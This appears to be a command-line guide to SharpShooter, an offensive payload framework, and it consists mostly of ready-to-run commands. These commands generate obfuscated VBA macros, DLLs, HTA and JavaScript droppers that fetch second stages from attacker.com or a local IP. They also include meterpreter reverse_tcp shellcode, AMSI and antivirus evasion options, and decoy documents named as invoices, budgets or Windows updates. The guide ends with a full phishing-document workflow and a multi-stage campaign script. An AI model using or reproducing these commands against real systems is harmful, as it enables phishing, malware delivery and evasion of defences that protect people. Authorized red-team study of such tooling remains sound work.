Overview
SharpShooter is a sophisticated payload generation framework designed for authorized penetration testers and security researchers. It creates polymorphic, obfuscated payloads across multiple formats (VBA, DotNet, JavaScript, HTA) with support for staged and stageless delivery mechanisms, encoding chains, and custom template injection.
Key Features
- Multi-format Payload Generation: VBA, DotNet, JavaScript, HTA, DLL, EXE
- Obfuscation Chains: Multiple encoding and obfuscation techniques
- Staged/Stageless Support: Flexible deployment models
- Template Injection: Customize payload behavior and appearance
- Polymorphic Output: Generates unique payloads each run
- AMSI/Defender Evasion: Built-in evasion techniques
- Cross-platform: Linux, macOS, Windows compatible
Installation
Prerequisites
# Python 3.6+ required
python3 --version
# Install dependencies
pip3 install pycryptodome
# Optional: Install msfvenom for shellcode generation
apt-get install metasploit-framework # Debian/Ubuntu
brew install metasploit # macOS
Installation Methods
From GitHub
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt
python3 SharpShooter.py --help
Docker
docker pull mdsec/sharpshooter:latest
docker run -it --rm \
-v /path/to/payloads:/payloads \
mdsec/sharpshooter:latest \
python3 SharpShooter.py [options]
Manual Installation
# Download release
wget https://github.com/mdsecactivebreach/SharpShooter/releases/download/v3.6/SharpShooter.zip
unzip SharpShooter.zip
cd SharpShooter
python3 SharpShooter.py --help
Core Concepts
Payload Types
| Type | Format | Use Case | Capabilities |
|---|
| vba | VBA macro | Office documents | Full .NET execution, AMSI bypass |
| dll | DLL file | DLL injection, COM objects | Native code execution |
| exe | EXE executable | Staged delivery | Direct execution |
| dotnet | .NET assembly | .NET environments | Managed code execution |
| js | JavaScript | Web browsers, HTA | Script execution |
| hta | HTML Application | Windows desktop | Script + IE engine |
| ps1 | PowerShell | Command-line | PowerShell execution |
Delivery Models
- Staged: Small downloader fetches full payload from C2 server
- Stageless: Complete payload embedded in delivery vehicle
- Mixed: Hybrid approach with modular components
Basic Usage
Simple Payload Generation
# Generate VBA macro (stageless, calc.exe PoC)
python3 SharpShooter.py -p vba -i calc
# Generate DLL payload
python3 SharpShooter.py -p dll -i calc
# Generate HTA payload
python3 SharpShooter.py -p hta -i calc
# Generate JavaScript payload
python3 SharpShooter.py -p js -i calc
Help and Options
# View all options
python3 SharpShooter.py --help
# Show examples
python3 SharpShooter.py --examples
# List available evasion techniques
python3 SharpShooter.py --list-evasions
Advanced Usage
# Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 \
-f raw -o shellcode.bin
# Generate payload with msfvenom shellcode
python3 SharpShooter.py \
-p vba \
-s shellcode.bin \
-c windows/meterpreter/reverse_tcp \
-r shellcode.bin \
-d "Download and execute payload"
Staged Payload with C2
# Generate VBA stager (downloads from C2)
python3 SharpShooter.py \
-p vba \
-u http://192.168.1.100:8080/payload.exe \
-s \
--smuggle
# Generate stager with custom headers
python3 SharpShooter.py \
-p vba \
-u http://attacker.com/stage2 \
-s \
--headers "Authorization: Bearer token123"
Obfuscation and Encoding
# VBA with maximum obfuscation
python3 SharpShooter.py \
-p vba \
-i calc \
--obfuscate \
--encode \
--no-cleanup
# Multiple encoding passes
python3 SharpShooter.py \
-p dll \
-i calc \
--base64 \
--xor \
--unicode
# Custom XOR key
python3 SharpShooter.py \
-p ps1 \
-i calc \
--xor-key "MySecretKey123"
Custom Delivery Templates
# Use custom Word/Excel template
python3 SharpShooter.py \
-p vba \
-i calc \
-t templates/custom_document.docx \
--template-injection
# Custom HTA template
python3 SharpShooter.py \
-p hta \
-i calc \
-t templates/custom.hta \
--custom-var payload_name=MyApp
Payload Options Reference
Command Line Arguments
| Argument | Short | Description | Example |
|---|
--payload | -p | Payload type | vba, dll, exe, dotnet, js, hta, ps1 |
--image | -i | Icon/PoC file | calc, notepad, powershell |
--shellcode | -s | Shellcode file | payload.bin |
--url | -u | Staging URL | http://attacker.com/stage |
--domain | -d | Target domain | example.com |
--output | -o | Output filename | custom_payload.vba |
--obfuscate | -ob | Enable obfuscation | true/false |
--encode | -en | Enable encoding | true/false |
--smuggle | -sm | Use HTTP smuggling | true/false |
--template | -t | Custom template file | template.docx |
--resource | -r | Resource file | resource.res |
VBA Macro Generation
Basic VBA Payload
# Simple VBA macro (Calc PoC)
python3 SharpShooter.py -p vba -i calc -o Document.macro
# With evasion
python3 SharpShooter.py -p vba -i calc -o Macro.vba --obfuscate
# Full obfuscation chain
python3 SharpShooter.py -p vba -i calc \
--obfuscate \
--encode \
--smuggle \
-o SuperObfuscated.vba
VBA in Office Documents
# Create macro-enabled Excel file
python3 SharpShooter.py \
-p vba \
-i calc \
-t templates/Excel_Template.xlsm \
-o Workbook.xlsm
# Create Word macro document
python3 SharpShooter.py \
-p vba \
-i calc \
-t templates/Word_Template.docm \
-o Document.docm
# Custom template with decoy content
python3 SharpShooter.py \
-p vba \
-i calc \
-t templates/legitimate_budget.xlsm \
-o budget_2024.xlsm
DLL Payload Generation
Reflective DLL Injection
# Generate DLL for reflective injection
python3 SharpShooter.py \
-p dll \
-i calc \
-o payload.dll
# DLL with exports (bypass detection)
python3 SharpShooter.py \
-p dll \
-i calc \
--export-function "Update" \
-o legitimate_library.dll
# Encrypted DLL payload
python3 SharpShooter.py \
-p dll \
-i calc \
--encrypt \
--encrypt-key "MyEncryptionKey" \
-o encrypted_payload.dll
DLL Staging
# Stager DLL that downloads second stage
python3 SharpShooter.py \
-p dll \
-s \
-u http://attacker.com/stage2.dll \
-o stager.dll
# DLL with custom export
python3 SharpShooter.py \
-p dll \
-i calc \
--com-mode \
--export "DllCanUnloadNow" \
-o com_object.dll
JavaScript/HTA Payloads
HTA (HTML Application)
# Simple HTA payload
python3 SharpShooter.py -p hta -i calc -o payload.hta
# HTA with embedded download
python3 SharpShooter.py \
-p hta \
-u http://attacker.com/second_stage.exe \
-o download.hta
# HTA with custom title/decoy
python3 SharpShooter.py \
-p hta \
-i calc \
--title "Windows Update Check" \
--icon windows_update_icon.ico \
-o WindowsUpdate.hta
JavaScript Payload
# Basic JavaScript
python3 SharpShooter.py -p js -i calc -o payload.js
# JavaScript with jQuery/Bootstrap obfuscation
python3 SharpShooter.py \
-p js \
-i calc \
--obfuscate \
--jquery \
-o obfuscated.js
# JavaScript dropper
python3 SharpShooter.py \
-p js \
-u http://attacker.com/executable.exe \
-o downloader.js
Evasion Techniques
AMSI Bypass
# VBA with AMSI bypass
python3 SharpShooter.py \
-p vba \
-i calc \
--amsi-bypass \
-o AMSIBypass.vba
# PowerShell with AMSI evasion
python3 SharpShooter.py \
-p ps1 \
-i calc \
--bypass-amsi \
--obfuscate \
-o script.ps1
Defender/AV Evasion
# Polymorphic encoding
python3 SharpShooter.py \
-p dll \
-i calc \
--polymorphic \
--unicode \
--junk-code \
-o evasive.dll
# Multiple XOR passes
python3 SharpShooter.py \
-p vba \
-i calc \
--xor-key "Pass1" \
--encode \
--base64 \
-o multi_encoded.vba
# Junk code insertion
python3 SharpShooter.py \
-p vba \
-i calc \
--junk-code \
--junk-lines 50 \
-o obfuscated.vba
Custom Encoding Chains
# Base64 + XOR + Base64
python3 SharpShooter.py \
-p ps1 \
-i calc \
--chain base64,xor,base64 \
--xor-key "SecretKey" \
-o encoded.ps1
# Custom cipher
python3 SharpShooter.py \
-p vba \
-i calc \
--cipher aes256 \
--cipher-key "32CharacterEncryptionKey123456" \
-o encrypted.vba
Payload Testing and Validation
Static Analysis Evasion
# Check entropy (helps detect obfuscation)
python3 -c "
import math
with open('payload.bin', 'rb') as f:
data = f.read()
entropy = -sum((data.count(bytes([i]))/len(data))*
math.log2(data.count(bytes([i]))/len(data))
for i in range(256) if data.count(bytes([i])) > 0)
print(f'Entropy: {entropy}')
"
# Check file signatures
file payload.dll
strings payload.dll | head -20
Dynamic Testing
# Use cuckoo sandbox (local setup)
# Note: Only in authorized lab environments
python3 scripts/test_payload.py \
--payload payload.exe \
--sandbox cuckoo \
--url http://cuckoo.local:8090
# Manual detonation (isolated VM)
# Only in isolated lab environment
powershell -ExecutionPolicy Bypass -File payload.ps1
Integration Examples
Macro-Enabled Document Workflow
#!/bin/bash
# Create complete phishing document
# Generate payload
python3 SharpShooter.py \
-p vba \
-i calc \
--obfuscate \
-o macro_payload.vba
# Inject into template
python3 scripts/inject_macro.py \
--template legitimate_invoice.docx \
--macro macro_payload.vba \
--output invoice_2024.docx
# Create archive for distribution
zip -e phishing_package.zip invoice_2024.docx
Multi-stage Campaign
#!/bin/bash
# First stage: VBA stager
python3 SharpShooter.py \
-p vba \
-u http://attacker.com:8080/stage2.exe \
-s \
--smuggle \
-o stage1.vba
# Second stage: Full payload
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 \
-f exe -o stage2.exe
# Serve stages
python3 -m http.server 8080 --directory ./payloads
Configuration Files
YAML Configuration
# Create config file
cat > config.yaml << 'EOF'
payloads:
- name: vba_calc
type: vba
icon: calc
obfuscate: true
encode: true
output: calc_macro.vba
- name: dll_stager
type: dll
url: http://attacker.com/stage2
staging: true
export: MyFunction
output: stager.dll
- name: hta_dropper
type: hta
url: http://attacker.com/payload.exe
title: Windows Update
output: update.hta
EOF
# Run batch generation
python3 scripts/batch_generate.py config.yaml
Troubleshooting
Python Dependencies
# Check dependencies
pip3 list | grep -E "pycryptodome|requests"
# Install/upgrade requirements
pip3 install -r requirements.txt --upgrade
# Fix permission issues
pip3 install --user -r requirements.txt
Payload Errors
# Verbose output for debugging
python3 SharpShooter.py -p vba -i calc -v
# Check template validity
python3 -m zipfile -l template.docx
# Validate XML (Office documents)
unzip -p template.docx word/document.xml | xmllint --format -
Encoding Issues
# Test encoding chain
python3 -c "
import base64
payload = open('shellcode.bin', 'rb').read()
encoded = base64.b64encode(payload)
print(f'Encoded length: {len(encoded)}')
print(f'Original: {len(payload)}')
"
# Verify XOR key
python3 scripts/verify_xor.py --payload encoded.bin --key "MyKey"
Best Practices
Operational Security
- Always test payloads in isolated lab environments first
- Use VPN/proxy when hosting payload infrastructure
- Rotate payloads frequently to avoid signature detection
- Use unique encoding chains per campaign
- Monitor C2 infrastructure for indicators of compromise
- Clean up malware samples and staging infrastructure
Legal and Ethical
- Only use with explicit written authorization
- Maintain detailed documentation of testing scope
- Use in red team/penetration testing contexts only
- Respect rules of engagement (ROE)
- Report all findings to authorized contacts
- Follow responsible disclosure practices
Quick Reference
| Task | Command |
|---|
| Generate VBA macro | python3 SharpShooter.py -p vba -i calc |
| Generate DLL | python3 SharpShooter.py -p dll -i calc |
| Generate HTA | python3 SharpShooter.py -p hta -i calc |
| Staged payload | python3 SharpShooter.py -p vba -u http://attacker.com/stage2 -s |
| With obfuscation | Add --obfuscate --encode --junk-code |
| Custom output | python3 SharpShooter.py -p vba -i calc -o custom.vba |
| AMSI bypass | python3 SharpShooter.py -p vba --amsi-bypass |
Resources
